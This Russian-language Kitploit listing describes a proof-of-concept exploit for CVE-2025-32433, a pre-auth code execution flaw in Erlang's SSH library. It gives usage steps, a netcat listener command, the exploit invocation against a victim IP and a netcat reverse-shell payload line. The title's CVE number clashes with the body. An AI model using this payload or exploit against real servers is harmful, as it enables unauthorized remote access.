Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-3243 — Эксплойт концептуального доказательства для CVE-2025-32433, критической уязвимости в библиотеке SSH языка Erlang, которая позволяет выполнение кода до аутентификации через некорректные пакеты SSH_MSG_CHANNEL_REQUEST. | Kitploit
Инструменты/GitHubGitHub/tenebrae93/cve-2025-3243
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubtenebrae93/cve-2025-3243

CVE-2025-3243

Эксплойт концептуального доказательства для CVE-2025-32433, критической уязвимости в библиотеке SSH языка Erlang, которая позволяет выполнение кода до аутентификации через некорректные пакеты SSH_MSG_CHANNEL_REQUEST.

Репозиторий
711 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-32433 Эксплойт для библиотеки Erlang SSH

Доказательство концепции эксплуатации CVE-2025-32433, критической уязвимости в библиотеке Erlang SSH, позволяющей выполнение кода до аутентификации с помощью специально сформированных пакетов SSH_MSG_CHANNEL_REQUEST.


Особенности

  • Оригинальный эксплойт от Matthew Keeley
  • Обновлённая версия от Tyler Ramsbey:
    • Аргументы командной строки для LHOST, LPORT, RHOST и RPORT
    • Встроенная справка и использование через argparse
    • Полезная нагрузка обратной оболочки в стиле Erlang с использованием os:cmd("nc LHOST LPORT -e /bin/sh").
    • Чистое разбиение на функции и логирование состояния для каждого этапа

Предварительные требования

  • Python 3
  • Работающий прослушиватель nc (Netcat) на вашей атакующей машине
  • Сетевой доступ к целевому SSH-сервису (порт по умолчанию 22)

Использование

  1. Запустите прослушиватель на атакующей машине:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Запустите эксплойт:

    root@kitploit:~
    python3 CVE-2025-32433.py -lh [IP-атакующего] -lp [Порт-атакующего] -rh [IP-жертвы] -rp [Порт-жертвы]
    
  3. Дождитесь подключения оболочки к вашему прослушивателю.

Меню справки

root@kitploit:~
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]

Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell

optional arguments:
  -h, --help            show this help message and exit
  -lh LHOST, --lhost LHOST
                        Local host/IP to receive the reverse shell
  -lp LPORT, --lport LPORT
                        Local port to receive the reverse shell
  -rh RHOST, --rhost RHOST
                        Target SSH server IP (default: 10.10.248.101)
  -rp RPORT, --rport RPORT
                        Target SSH server port (default: 22)

Авторы

  • Оригинальный скрипт от Matthew Keeley (MattKeeley)
  • Эта обновлённая версия от Tyler Ramsbey

Отказ от ответственности

Используйте этот код только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение. Несанкционированная эксплуатация уязвимостей незаконна и неэтична.

Скачать инструмент